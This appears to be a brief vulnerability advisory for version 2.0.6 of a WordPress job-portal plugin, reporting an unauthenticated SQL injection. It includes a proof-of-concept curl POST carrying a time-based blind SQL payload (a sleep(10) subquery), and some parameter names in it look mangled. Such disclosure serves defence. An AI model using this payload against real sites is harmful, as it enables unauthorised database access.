Description The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
Setup (as admin): Create a dummy company and a job (if there are none) Attack (as unauthenticated): time curl -X POST --data ‘jobtitle=a&city;=(select*from(select(sleep(10)))a)&wpjobportallay;=jobs&WPJOBPORTAL;_form_search=WPJOBPORTAL_SEARCH’ https://example.com/wp-job-portal-jobseeker-controlpanel/jobs/ and notice the 10s delay of the response
CPE | Name | Operator | Version |
---|---|---|---|
eq | 2.0.6 |